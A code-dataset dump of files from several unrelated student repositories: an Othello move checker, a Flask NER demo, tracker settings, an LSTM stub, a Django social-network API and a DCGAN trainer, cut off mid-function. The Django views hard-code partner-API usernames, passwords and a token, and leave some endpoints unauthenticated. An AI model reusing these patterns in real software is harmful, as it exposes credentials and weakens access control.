# 取得された座標はのself.overturn_x、self.overturn_yに格納される
for xx in kensa:
for yy in kensa:
# xxとyyが置いた石の座標と被ったときの処理を飛ばす
if xx == 0 and yy == 0:
continue
tmpx = []
tmpy = []
takasa = 0
# 直線の石を調べる
while(True):
takasa += 1
# x座標とy座標の石を直線的に探す
tyokusen_x = x + (xx * takasa)
tyokusen_y = y + (yy * takasa)
# rxとryに石はあるのかの判定と、ひっくり返せるかの判定
if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8:
osero = grid[int(tyokusen_y)][int(tyokusen_x)]
# 自分の石が見つかったとき
if osero == player:
if tmpx != [] and tmpy != []:
# print("追加しました")
overturn_x.append(tmpx)
overturn_y.append(tmpy)
break
else:
break
# 相手の石が見つかったとき
elif osero != player:
if osero == 0:
break
else:
tmpx.append(tyokusen_x)
tmpy.append(tyokusen_y)
else:
break
if overturn_x == [] and overturn_y == []:
continue
else:
put_x.append(x)
put_y.append(y)
if put_x == []:
return True
else :
return False
``` |
{
"source": "2021-asr-internship-ysy/pytorch-bert-crf-ner",
"score": 2
} |
#### File: 2021-asr-internship-ysy/pytorch-bert-crf-ner/app.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from flask import Flask, render_template, request
from inference import DecoderFromNamedEntitySequence
import json
import pickle
import torch
from gluonnlp.data import SentencepieceTokenizer
from model.net import KobertCRFViz
from data_utils.utils import Config
from data_utils.vocab_tokenizer import Tokenizer
from data_utils.pad_sequence import keras_pad_fn
from pathlib import Path
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/test')
def test():
return render_template('post.html')
@app.route('/post', methods=['POST'])
def post():
value = request.form['input']
model_dir = Path('./experiments/base_model_with_crf')
model_config = Config(json_path=model_dir / 'config.json')
# load vocab & tokenizer
tok_path = "ptr_lm_model/tokenizer_78b3253a26.model"
ptr_tokenizer = SentencepieceTokenizer(tok_path)
with open(model_dir / "vocab.pkl", 'rb') as f:
vocab = pickle.load(f)
tokenizer = Tokenizer(vocab=vocab, split_fn=ptr_tokenizer, pad_fn=keras_pad_fn, maxlen=model_config.maxlen)
# load ner_to_index.json
with open(model_dir / "ner_to_index.json", 'rb') as f:
ner_to_index = json.load(f)
index_to_ner = {v: k for k, v in ner_to_index.items()}
# model
model = KobertCRFViz(config=model_config, num_classes=len(ner_to_index), vocab=vocab)
# load
model_dict = model.state_dict()
checkpoint = torch.load("./experiments/base_model_with_crf/best-epoch-16-step-1500-acc-0.993.bin",
map_location=torch.device('cpu'))
convert_keys = {}
for k, v in checkpoint['model_state_dict'].items():
new_key_name = k.replace("module.", '')
if new_key_name not in model_dict:
print("{} is not int model_dict".format(new_key_name))
continue
convert_keys[new_key_name] = v
model.load_state_dict(convert_keys, strict=False)
model.eval()
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
model.to(device)
decoder_from_res = DecoderFromNamedEntitySequence(tokenizer=tokenizer, index_to_ner=index_to_ner)
input_text = value
list_of_input_ids = tokenizer.list_of_string_to_list_of_cls_sep_token_ids([input_text])
x_input = torch.tensor(list_of_input_ids).long()
list_of_pred_ids, _ = model(x_input)
list_of_ner_word, decoding_ner_sentence = decoder_from_res(list_of_input_ids=list_of_input_ids,
list_of_pred_ids=list_of_pred_ids)
return {'word': list_of_ner_word, 'decoding': decoding_ner_sentence}
if __name__ == '__main__':
# app.debug = True
app.run(host='0.0.0.0')
``` |
{
"source": "2021-DGSW-Ensemble/Ensemble-AI",
"score": 2
} |
#### File: test/evaluation/local.py
```python
import importlib
import os
class EnvSettings:
def __init__(self):
test_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
self.results_path = '{}/tracking_results/'.format(test_path)
self.segmentation_path = '{}/segmentation_results/'.format(test_path)
self.network_path = '{}/networks/'.format(test_path)
self.result_plot_path = '{}/result_plots/'.format(test_path)
self.otb_path = ''
self.nfs_path = ''
self.uav_path = ''
self.tpl_path = ''
self.vot_path = ''
self.got10k_path = ''
self.lasot_path = ''
self.trackingnet_path = ''
self.davis_dir = ''
self.youtubevos_dir = ''
self.got_packed_results_path = ''
self.got_reports_path = ''
self.tn_packed_results_path = ''
def local_env_settings():
settings = EnvSettings()
# Set your local paths here.
settings.davis_dir = ''
settings.got10k_path = ''
settings.got_packed_results_path = ''
settings.got_reports_path = ''
settings.lasot_path = ''
settings.network_path = '../networks/' # Where tracking networks are stored.
settings.nfs_path = ''
settings.otb_path = ''
settings.prj_dir = ''
settings.save_dir = ''
settings.result_plot_path = '../result_plots/'
settings.results_path = '../tracking_results/' # Where to store tracking results
settings.segmentation_path = '../segmentation_results/'
settings.tn_packed_results_path = ''
settings.tpl_path = ''
settings.trackingnet_path = ''
settings.uav_path = ''
settings.vot_path = ''
settings.youtubevos_dir = ''
return settings
``` |
{
"source": "2021-DL-Training-Program/Lab3-Image-Caption",
"score": 3
} |
#### File: 2021-DL-Training-Program/Lab3-Image-Caption/DIY_LSTM.py
```python
import math
import torch
import warnings
import itertools
import numbers
from torch.nn.modules.module import Module
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import PackedSequence
from torch.nn import init
import torch.nn as nn
class my_LSTM(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, if_bias=True, batch_first=False):
super(my_LSTM, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.if_bias = if_bias
self.batch_first = batch_first
'''
TO-DO: define each matric multiplication here
'''
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
self.reset_parameters()
def reset_parameters(self):
stdv = 1.0 / math.sqrt(self.hidden_size)
for weight in self.parameters():
init.uniform_(weight, -stdv, stdv)
def forward(self, input_seq, hx=None):
'''
TO-DO: check if input_seq is a packed sequence. If yes, unpack it.
'''
# outputs
hidden_state_list = []
cell_state_list = []
'''
TO-DO: if hx is None, initialize it.
'''
if hx is None:
pass
else:
pass
'''
TO-DO: implement LSTM here
'''
hidden_state_list = torch.cat(hidden_state_list, 0)
cell_state_list = torch.cat(cell_state_list, 0)
return hidden_state_list, (hidden_state_list, cell_state_list)
``` |
{
"source": "2021fallCMPUT404/group-cmput404-project",
"score": 2
} |
#### File: mysite/posts/serializers.py
```python
from django.db.models.fields import SlugField
from rest_framework import serializers
from .models import Post, Comment, Like, CommentLike, Node#, InboxLike
from users.serializers import User_Profile, userPSerializer, UserSerializer, InboxSerializer
class PostSerializer(serializers.ModelSerializer):
#author = serializers.StringRelatedField(source = 'author.username')
#shared_user = serializers.StringRelatedField(source = 'shared_user.username', many=True)
#author = userPSerializer(many=False, read_only=True)
author = UserSerializer(read_only=True)
class Meta:
model = Post
fields = ('type', 'id', 'title', 'text', 'image', 'pub_date', 'author',
'shared_user', 'shared_on', 'privacy', 'contentType')
'''
def create(self, validated_data):
return Post.objects.create(**validated_data)
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.title = validated_data.get('title', instance.title)
instance.text = validated_data.get('text', instance.text)
instance.image = validated_data.get('image', instance.image)
instance.pub_date = validated_data.get('pub_date', instance.pub_date)
instance.author = validated_data.get('author', instance.author)
instance.shared_user = validated_data.get('shared_user',
instance.shared_user)
instance.shared_on = validated_data.get('shared_on',
instance.shared_on)
instance.privacy = validated_data.get('privacy', instance.privacy)
instance.contentType = validated_data.get('contentType',
instance.contentType)
instance.save()
return instance
'''
'''
def validate(self, data):
if data['author'] == None:
raise serializers.ValidationError("No such author")
return data
'''
class LikeSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
class Meta:
model = Like
fields = ('type', 'user', 'object')
class CommentSerializer(serializers.ModelSerializer):
author = userPSerializer(many=False, read_only=True)
like = LikeSerializer(many=True, read_only=True)
class Meta:
model = Comment
fields = ('type', 'author', 'post', 'comment_body', 'comment_created',
'like', 'id')
class LikeCommentSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = CommentLike
fields = ('user', 'comment')
class NodeSerializer(serializers.ModelSerializer):
class Meta:
model = Node
fields = ['url', 'username','password']
'''
class InboxLikeSerializer(serializers.ModelSerializer):
class Meta:
model = InboxLike
fields = "__all__"
'''
```
#### File: group-cmput404-project/mysite/test_post_model.py
```python
from django.test import TestCase
from requests.sessions import TooManyRedirects
from test_users_model_form import *
from posts.models import Post, Comment
from users.serializers import UserSerializer
class test_post(TestCase):
def setUp(self):
user1 = User.objects.create(username='testcase',
first_name='test',
last_name='case',
email='<EMAIL>',
password='<PASSWORD>')
User_Profile.objects.create(
displayName='case_1',
user=user1,
first_name='test',
last_name='case',
email='<EMAIL>',
profileImage='test_image.jpg',
github='JohnChen97',
bio='test_bio1')
test_user_1 = User.objects.get(username="testcase")
test_profile_1 = User_Profile.objects.get(user=test_user_1)
Post.objects.create(
#type = 'post',
text = 'trial',
image='test_image.jpg',
author=test_user_1,
shared_user = None,
shared_on = None)
test_post_1 = Post.objects.get(author = test_user_1)
user_serializer = UserSerializer(user1)
user_data = user_serializer.data
Comment.objects.create(post = test_post_1, author = user_data, comment_body = 'test_comment_body')
def test_post_cases(self):
test_user_1 = User.objects.get(username = "testcase")
test_profile_1 = User_Profile.objects.get(user = test_user_1)
test_ps = Post.objects.get(author=test_user_1)
self.assertEqual(test_ps.text, 'trial')
self.assertEqual(test_ps.image, 'test_image.jpg')
def test_comment(self):
test_user_1 = User.objects.get(username = "testcase")
test_profile_1 = User_Profile.objects.get(user = test_user_1)
test_ps = Post.objects.get(author=test_user_1)
test_comment = Comment.objects.get(post = test_ps)
self.assertEqual(test_comment.comment_body, 'test_comment_body')
```
#### File: mysite/users/serializers.py
```python
from rest_framework import *
from rest_framework import serializers
from rest_framework.serializers import *
from .models import FriendRequest, User, User_Profile, UserFollows, Inbox
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['username', 'email', 'first_name', 'last_name']
#fields = '__all__'
def to_representation(self, instance):
ret = super().to_representation(instance)
user_profile = User_Profile.objects.get(user=instance)
user_profile = userPSerializer(user_profile)
print(user_profile.data)
ret.update(user_profile.data)
#ret['profileImage'] = user_profile.data
ret['url'] = "https://cmput404-socialdist-project.herokuapp.com/author/{}".format(str(instance.id))
ret['host'] = 'https://cmput404-socialdist-project.herokuapp.com/'
return ret
'''
def validate(self, data):
if not User.objects.get(data['author']).exists:
raise serializers.ValidationError("The author is None")
return data
'''
#User profile serializer
#TODO: Maybe add a full user profile serialzier that includes all fields
class userPSerializer(serializers.ModelSerializer):
#This puts in the type attribute since __all__ is not grabbing User_Profile.type attribute for some reason
#Reference: https://stackoverflow.com/a/60891077
id = SerializerMethodField('set_id')
class Meta:
model = User_Profile
fields = [
'type', 'id', 'url', 'host', 'displayName', 'github', 'bio',
'profileImage', 'user'
] #TODO: ADD URL AND HOST
read_only_fields = ['type','user']
def set_id(self, obj):
return '{}author/{}'.format(obj.host, obj.id)
class userFollowSerializer(serializers.ModelSerializer):
class Meta:
model = UserFollows
fields = '__all__'
class friend_request_serializer(serializers.ModelSerializer):
type = 'Follow'
actor = userPSerializer(many=False, read_only=True)
object = userPSerializer(many=False, read_only=True)
summary = "{} wants to follow {}".format(actor.data['displayName'],
object.data['displayName'])
class Meta:
model = FriendRequest
fields = [
'type',
'summary',
'actor',
'object',
]
class InboxSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
class Meta:
model = Inbox()
fields = ['type', 'author']
```
#### File: mysite/users/views.py
```python
from django.http.response import JsonResponse
from django.shortcuts import render, get_object_or_404
from . import views
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from .models import User, Create_user, User_Profile, FriendRequest, UserFollows, Inbox
from posts.views import * #Will change this later on
from posts.serializers import * #Also will change this too
from django.apps import apps
from . import create_user_form
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseBadRequest, JsonResponse
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy
from django.db.models import Q
from django.core.paginator import Paginator
from .serializers import UserSerializer, userFollowSerializer, userPSerializer, friend_request_serializer
from rest_framework import routers
#rest framework imports
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from django.views.decorators.csrf import csrf_exempt
from rest_framework.authtoken.models import Token
from rest_framework.permissions import IsAuthenticated
from rest_framework.decorators import authentication_classes
from rest_framework.authentication import TokenAuthentication, get_authorization_header
from rest_framework import authentication, permissions
import base64
import requests
import json
Post_model = apps.get_model('posts', 'Post')
class AccessPermission(permissions.BasePermission):
def has_permission(self, request, view):
auth_header = request.META.get('HTTP_AUTHORIZATION', '')
token_type, _, credentials = auth_header.partition(' ')
expected = base64.b64encode(b'socialdistribution_t05:c404t05').decode()
if token_type == 'Basic' and credentials == expected:
return True
else:
return False
class CustomAuthentication(authentication.BaseAuthentication):
def authenticate(self, request):
auth_header = request.META.get('HTTP_AUTHORIZATION', '')
token_type, _, credentials = auth_header.partition(' ')
expected = base64.b64encode(b'socialcircleauth:cmput404').decode()
if token_type == 'Basic' and credentials == expected:
return (True, None)
else:
return None
def authenticate_header(self, request):
return '{"username" : <username>, "password" : <password>}'
class ManageUserView(APIView):
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
http_method_names = ["get", "post"]
def get(self, request, author_id, format=None):
try:
user = get_object_or_404(User, pk=author_id)
user_profile = get_object_or_404(User_Profile, user=user)
serializer = userPSerializer(user_profile, many=False)
return Response(serializer.data)
except Exception as e:
return JsonResponse({'msg':'There was an error: {}'.format(e)})
def post(self, request, author_id, format=None):
try:
user = get_object_or_404(User, pk=author_id)
user_profile = get_object_or_404(User_Profile, user=user)
#data = JSONParser().parse(request)
serializer = userPSerializer(instance=user_profile, data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
except Exception as e:
return JsonResponse({'msg':'There was an error {}'.format(e)})
@api_view(['GET'])
def apiOverview(request):
return Response("API BASE POINT", safe=False)
#TODO: ADD PAGINATION WHERE NEEDED
@api_view(['GET'])
@authentication_classes([])
@permission_classes([])
def UserList(request):
user_profiles = User_Profile.objects.all()
page_number = request.GET.get('page', 1)
page_size = request.GET.get('size', 5)
paginator = Paginator(user_profiles, page_size)
page_obj = paginator.get_page(page_number)
serializer = userPSerializer(page_obj, many=True)
return Response({'type': 'authors', 'page':page_number, 'size':page_size , 'items':serializer.data})
@api_view(['GET'])
@authentication_classes([CustomAuthentication])
@permission_classes([AccessPermission])
def userGet(request, User_id):
user = get_object_or_404(User, pk=User_id)
print(user)
print(user.id, User_id)
user_profile = get_object_or_404(User_Profile, user=user)
if request.method == "GET":
serializer = userPSerializer(user_profile, many=False)
return Response(serializer.data)
@api_view(['POST'])
@authentication_classes([TokenAuthentication])
@permission_classes([IsAuthenticated])
def userPost(request, User_id):
user = get_object_or_404(User, pk=User_id)
print(user)
print(user.id, User_id)
user_profile = get_object_or_404(User_Profile, user=user)
if request.method == "POST":
serializer = userPSerializer(instance=user_profile, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
@api_view(['GET'])
@authentication_classes([])
@permission_classes([])
def follow_list(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user=user)
followers_list = UserFollows.objects.filter(object=user_profile)
actor_list = []
for follow in followers_list:
actor_list.append(follow.actor)
serializer = userPSerializer(actor_list, many=True)
return Response({'type': 'follow', 'items': serializer.data})
@api_view(['GET'])
@authentication_classes([CustomAuthentication])
@permission_classes([AccessPermission])
def following_list(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user=user)
followers_list = UserFollows.objects.filter(actor=user_profile)
object_list = []
for followed in followers_list:
object_list.append(followed.object)
serializer = userPSerializer(object_list, many=True)
return Response({'type': 'following', 'items': serializer.data})
@api_view(['GET', 'PUT', 'DELETE'])
@authentication_classes([])
@permission_classes([])
def get_follow(request, User_id, Foreign_id):
if request.method == 'GET':
user = get_object_or_404(User, pk=User_id)
foreign_user = get_object_or_404(User, pk=Foreign_id)
user_profile = get_object_or_404(User_Profile, user=user)
foreign_user_profile = get_object_or_404(User_Profile, user=foreign_user)
if request.method == 'GET':
thing = UserFollows.objects.filter(actor=foreign_user_profile,
object=user_profile).first()
if thing != None:
return HttpResponse('True\n')
else:
return HttpResponse('False\n')
#serializer = userFollowSerializer(thing, many=False)
#print('PRINTING DATA:', serializer)
#return Response(serializer.data)
else:
print(request._request)
return follow_crud(request._request, User_id, Foreign_id)
@api_view(['PUT', 'DELETE'])
@authentication_classes([TokenAuthentication])
@permission_classes([IsAuthenticated])
def follow_crud(request, User_id, Foreign_id):
user = get_object_or_404(User, pk=User_id)
foreign_user = get_object_or_404(User, pk=Foreign_id)
user_profile = get_object_or_404(User_Profile, user=user)
foreign_user_profile = get_object_or_404(User_Profile, user=foreign_user)
if request.method == 'PUT':
#TODO: PUT METHOD NEEDS TO BE AUTHENTICATED
#f_request, created = FriendRequest.objects.get_or_create(actor=foreign_user_profile, object=user_profile)
FriendRequest.create_friend_request(foreign_user_profile, user_profile)
UserFollows.create_user_follow(foreign_user_profile, user_profile)
return Response('PUT')
elif request.method == 'DELETE':
print('{} is unfollowing {}'.format(foreign_user_profile.displayName,
user_profile.displayName))
UserFollows.delete_user_follow(foreign_user_profile, user_profile)
return Response('DELETE')
else:
return HttpResponseBadRequest('Bad')
return Response()
@api_view(['GET', 'POST'])
@authentication_classes([])
@permission_classes([])
def get_post_comments(request, User_id, post_id):
user = get_object_or_404(User, pk=User_id)
post = get_object_or_404(Post_model, pk=post_id, author=user)
if request.method == "GET":
comments = Comment.objects.filter(post=post_id)
serializers = CommentSerializer(comments, many=True)
return Response(serializers.data)
elif request.method == "POST":
return
else:
return HttpResponseBadRequest("Method {} is not allowed".format(
request.method))
return Response()
return Response('')
def homepage(request):
return HttpResponse("Placeholder homepage")
def placeholder(request, User_id):
#latest_user_list = User.objects.order_by('-id')[:5]
#output = ','.join([str(q.username) for q in latest_user_list])
user = get_object_or_404(User, pk=User_id)
output = 'User id is: {}, Username is: {}, passoword is: {}'.format(
user.id, user.username, user.password)
return HttpResponse(output)
def user_post_view(request, User_id):
user = get_object_or_404(User, pk=User_id)
latest_post_list = Post_model.objects.all().filter(author__id=user.id)
print(latest_post_list)
return render(request, 'posts/placeholder.html',
{'latest_post_list': latest_post_list})
def index(request):
#my_dict = {'insert_me': "This line is from users/index.html"}
return render(request, 'users/user_home_page.html')
def create_user_view(request):
#form = Create_user()
form = create_user_form.create_new_user(request.POST)
if request.method == "POST":
#form = Create_user(request.POST)
form = create_user_form.create_new_user(request.POST)
if form.is_valid():
print("OK")
#TODO: CHECK IF THE USER ALREADY EXISTS IN THE DATABASE
new_user = User.objects.create_user(
username=form.cleaned_data['displayName'],
password=form.cleaned_data['password'])
user_prof = User_Profile(user=new_user)
print(user_prof.user, user_prof.type)
print(new_user.id)
user_prof.save()
form.clean()
else:
print("not ok")
return render(request, 'users/create_user.html', {'form': form})
def register(request):
registered_user = False
if request.method == "POST":
user_form = create_user_form.create_new_user(request.POST)
user_profile_form = create_user_form.create_new_user_profile(
request.POST)
if user_form.is_valid() and user_profile_form.is_valid():
user = user_form.save()
user.set_password(<PASSWORD>)
user.save()
profile = user_profile_form.save(commit=False)
profile.user = user
inbox = Inbox(author=user)
inbox.save()
if 'profileImage' in request.FILES:
profile.profileImage = request.FILES['profileImage']
profile.save()
registered = True
return render(request, 'users/login.html')
else:
print('register failed')
print('user form error:' + str(user_form.errors))
print('user profile form error:' + str(user_profile_form.errors))
else:
user_form = create_user_form.create_new_user()
user_profile_form = create_user_form.create_new_user_profile()
return render(
request, 'users/register.html', {
'user_registered': registered_user,
'user_form': user_form,
'profile_form': user_profile_form
})
def login_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user:
try:
token = Token.objects.get(user_id=user.id)
except Token.DoesNotExist:
token = Token.objects.create(user=user)
if user:
if user.is_active:
login(request, user)
#return HttpResponseRedirect('user_home_page')
return redirect('feed')
else:
print('This user account is not activated yet')
return HttpResponse('This user account is not activated yet')
else:
print('No such username or password in the database')
#HttpResponse('No such username or password in the database')
return render(request, 'users/login_failed.html')
else:
return render(request, 'users/login.html', {})
@login_required
def logout_view(request):
logout(request)
return render(request, 'users/login.html')
@login_required
def confirm_logout_view(request):
return HttpResponse("logout from the user account")
@login_required
def user_home_page_view(request):
user = User.objects.get(id=request.user.id)
user_profile_image = User_Profile.profileImage
the_user_profile = User_Profile.objects.get(user=request.user)
user_display_name = the_user_profile.displayName
return render(request,
'users/user_home_page.html',
context={
'insert_display_name': user_display_name,
'user_profile_image': user_profile_image
})
@login_required
def edit_user_profile_view(request):
if request.method == "POST":
user_profile_form = create_user_form.create_new_user_profile(
request.POST)
original_user_profile = User_Profile.objects.get(user=request.user)
if user_profile_form.is_valid():
#profile = user_profile_form.save(commit=False)
#request.user.profile = profile
original_user_profile.displayName = request.POST['displayName']
original_user_profile.bio = request.POST['bio']
original_user_profile.github = request.POST['github']
if 'profileImage' in request.FILES:
original_user_profile.profileImage = request.FILES[
'profileImage']
original_user_profile.save()
else:
print('edit user profile failed')
print('user profile form error:' + str(user_profile_form.errors))
else:
user_profile_form = create_user_form.create_new_user_profile()
return render(request, 'users/edit_user_profile.html',
{'profile_form': user_profile_form})
def advance_home_page_view(request):
return render(request, 'users/advance_home_page.html')
def send_friend_request(request, User_id):
if request.user.is_anonymous:
return HttpResponseForbidden("Please sign in")
user = get_object_or_404(User, pk=User_id)
print(user)
request_profile = User_Profile.objects.get(user=request.user)
#Checks if the object_profile is valid
object_profile = get_object_or_404(User_Profile, user_id=User_id)
#TODO: CHECK IF THE ACTOR IS ALREADY FOLLOWING THE OBJECT
f_request = FriendRequest.create_friend_request(request_profile,
object_profile)
serializer = friend_request_serializer(f_request, many=False)
print(serializer)
print(serializer.data)
return HttpResponseRedirect(reverse('users:request_page'))
#return JsonResponse(serializer.data)
def accept_friend_request(request, User_id):
#User id is from the actor, the person who sent the friend request
#Error checking
if request.user.is_anonymous:
return HttpResponseForbidden("Please sign in")
actor_user_profile = get_object_or_404(User_Profile, user_id=User_id)
object_user_profile = get_object_or_404(User_Profile, user=request.user)
f_request = FriendRequest.objects.filter(actor=actor_user_profile,
object=object_user_profile)
if not f_request.exists():
return HttpResponseBadRequest("Friend request does not exist")
#TODO: ADD THE ACTOR IN USER FOLLOWS
actor_user = get_object_or_404(User, pk=User_id)
UserFollows.objects.get_or_create(actor=actor_user_profile,
object=object_user_profile)
UserFollows.objects.get_or_create(actor=object_user_profile,
object=actor_user_profile)
#TODO: DO SOME ERROR CHECKING AND CHECK IF THE F_REQUEST INSTANCE EXISTS
f_request.delete()
print("{} accepted {}s' friend request".format(
object_user_profile.displayName, actor_user_profile.displayName))
return HttpResponseRedirect('/authors/requests/view-request/{}/'.format(
request.user.id))
def reject_friend_request(request, User_id):
if request.user.is_anonymous:
return HttpResponseForbidden("Please sign in")
actor_user_profile = get_object_or_404(User_Profile, user_id=User_id)
object_user_profile = get_object_or_404(User_Profile, user=request.user)
f_request = FriendRequest.objects.filter(actor=actor_user_profile,
object=object_user_profile)
if not f_request.exists(): #Checks if the friend request exists
return HttpResponseBadRequest("Friend request does not exist")
f_request.delete()
print("{} deleted {}s' friend request".format(
object_user_profile.displayName, actor_user_profile.displayName))
return HttpResponseRedirect('/authors/requests/view-request/{}/'.format(
request.user.id))
def view_friend_requests(request, User_id):
#Makes sure that only the author can see the requests
if request.user.id != User_id:
return HttpResponseForbidden("You are forbidden")
user_profile = get_object_or_404(User_Profile, user_id=User_id)
recieved_requests = FriendRequest.objects.filter(object=user_profile)
sent_requests = FriendRequest.objects.filter(actor=user_profile)
print(recieved_requests, sent_requests)
return render(request, 'users/view_requests.html', {
'recieved_requests': recieved_requests,
'sent_requests': sent_requests
})
def get_t15_authors(url):
ext_request = requests.get(
url,
auth=('connectionsuperuser', '404connection'),
headers={
'Referer': "https://cmput404-socialdist-project.herokuapp.com/"
})
ext_request = ext_request.json()
return ext_request
def view_t15_users(request):
url = "https://unhindled.herokuapp.com/service/authors"
authors = get_t15_authors(url)
list_of_authors = []
for i in authors['items']:
list_of_authors.append(i)
return render(request, 'users/team15users.html',
{'authors': list_of_authors})
def make_external_request(url, auth):
ext_request = requests.get(
url,
auth=auth,
headers={
'Referer': "https://cmput404-socialdist-project.herokuapp.com/"
})
ext_request = ext_request.json()
return ext_request
def view_t3_users(request):
url = "https://social-dis.herokuapp.com/authors/"
auth = ('socialdistribution_t03', '<PASSWORD>')
ext_json = make_external_request(url, auth)
print(ext_json['items'])
return render(request, 'users/t03_users.html',
{'authors': ext_json['items']})
def view_t3_posts(request):
url = "https://social-dis.herokuapp.com/posts/"
auth = ('socialdistribution_t03', '<PASSWORD>')
ext_json = make_external_request(url, auth)
#print(ext_json['items'])
return render(request, 'users/t03_posts.html',
{'post_list': ext_json['items']})
def view_followers(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user=user)
followers_list = UserFollows.objects.filter(object=user_profile)
follows_list = UserFollows.objects.filter(actor=user_profile)
is_user = (request.user.id == User_id)
#friends_list = UserFollows.objects.filter(object_id=user_profile)
for x in followers_list:
print(x.actor.displayName)
return render(
request, 'users/view_followers.html', {
'followers_list': followers_list,
'user': user_profile,
'request': request,
'follows_list': follows_list
})
# This function will make it so that User_id user will stop following
# foreign_id user
def unfollower_user(request, User_id, foreign_id):
if request.user.id != User_id:
return HttpResponseForbidden("Action is not allowed.")
user_profile = fetch_user_profiles(User_id)
foreign_profile = fetch_user_profiles(foreign_id)
UserFollows.delete_user_follow(user_profile, foreign_profile)
return HttpResponseRedirect(reverse( 'users:view_followers',args=[User_id]))
def fetch_user_profiles(user_id):
user = get_object_or_404(User, pk=user_id)
return get_object_or_404(User_Profile, user=user)
def send_request_page(request):
user_profile = get_object_or_404(User_Profile, user_id=request.user.id)
users_list = User_Profile.objects.filter(~Q(user=request.user))
print(users_list)
return render(request, 'users/send_requests.html',
{'users_list': users_list})
def get_user_page(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user_id=User_id)
return render(request, 'users/author_page_json.html', {'user_id': User_id})
@login_required
def display_token(request):
token = Token.objects.get(user=request.user).key
return render(request,
'users/display_token.html',
context={'user_token': token})
#curl -X GET http://127.0.0.1:8000/post/request_post_list -H 'Authorization: Token 8a91340fa2849cdc7e0e7aa07f4b2c0e91f09a3a'
#curl -X GET http://127.0.0.1:8000/authors/send_token -H 'Authorization: Username doge Password <PASSWORD>'
@login_required
def generate_token(request):
user = request.user
new_token = Token.objects.get(user=user)
user.token = new_token
user.save()
return HttpResponseRedirect('user_home_page')
#curl -X GET http://127.0.0.1:8000/post/request_post_list -H 'Authorization: Token 8a91340fa2849cdc7e0e7aa07f4b2c0e91f09a3a'
``` |
{
"source": "2021-FIIT-Bc-projects/DCGAN-Docker",
"score": 2
} |
#### File: gan/src/dcgan_models.py
```python
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, \
Conv2D, \
ReLU, \
LeakyReLU, \
Dropout, \
Flatten, \
Reshape, \
Conv2DTranspose, \
BatchNormalization
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import initializers, optimizers
from os import stat, mkdir, path, listdir, remove
import datetime # testing
import numpy as np
import math
from matplotlib import pyplot as plt
import random
from PIL import Image
from skimage.transform import resize
import csv # for logging
#dataset_path = "/content/ffhq-dataset/thumbnails128x128"
#output_path = "/content/drive/My Drive/gan_files"
class GAN:
def __init__(self, generator, discriminator, height=64, width=64, model_name="dcgan_tanh_x64", output_path="", dataset_size=70000, inputs=None, lr=0.0002):
self.dataset_size = dataset_size
self.batch_size = None
model_directory = path.join(output_path, model_name)
try:
stat(model_directory)
except:
mkdir(model_directory)
mkdir(path.join(model_directory, "saves"))
mkdir(path.join(model_directory, "outputs"))
mkdir(path.join(model_directory, "outputs", "evaluation"))
mkdir(path.join(model_directory, "anim"))
self.height = height
self.width = width
self.model_name = model_name
self.output_path = output_path
discriminator.model.trainable = False
self.model = Sequential()
self.model.add(generator.model)
self.model.add(discriminator.model)
self.model.layers[0]._name = 'Generator'
self.model.layers[1]._name = 'Discriminator'
adam = Adam(learning_rate=lr, beta_1=0.5)
self.model.compile(loss='binary_crossentropy', optimizer=adam)
self.generator = generator
self.discriminator = discriminator
self.inputs = inputs;
def eval_performance(self, losses, init_time,
n_dim, i_epoch, n_epochs, i_batch, n_batches, inputs, n=100, n_plot=10, plot_size=9, disable_plot=False):
# x_real, y_real = self.discriminator.generate_real_samples_random(n, 0, self.dataset_size)
x_real, y_real = self.discriminator.generate_real_samples_random(n, type=self.discriminator.dataset_type)
_, acc_real = self.discriminator.model.evaluate(x_real, y_real, verbose=0)
input_points = random_latent_points(n_dim, n)
x_fake, y_fake = self.generator.generate_fake_samples(input_points, n_dim, n)
_, acc_fake = self.discriminator.model.evaluate(x_fake, y_fake, verbose=0)
batch_id = i_epoch * n_batches + i_batch
timestamp = datetime.datetime.now()
eval_row = [batch_id,
timestamp,
losses[0],
losses[1],
losses[2],
acc_real,
acc_fake,
]
with open(path.join(self.output_path, self.model_name, 'outputs', 'evaluation', 'metrics.csv'), 'a+') as metrics_file:
writer = csv.writer(metrics_file, delimiter=',')
writer.writerow(eval_row)
print(f"[Batch {batch_id}:]\n"
f"Time since start of session: {timestamp - init_time}\n"
f"Discriminator real loss: {losses[0]}\n"
f"Discriminator fake loss: {losses[1]}\n"
f"Gan fitting loss: {losses[2]}\n"
f"Real accuracy: {acc_real}\n"
f"Fake accuracy: {acc_fake}\n"
f"Metrics logged to csv file.")
if i_batch % n_plot == 0:
# n_factor = math.sqrt(n)
fig = generate_and_plot(self.generator, n_dim, inputs, plot_size)
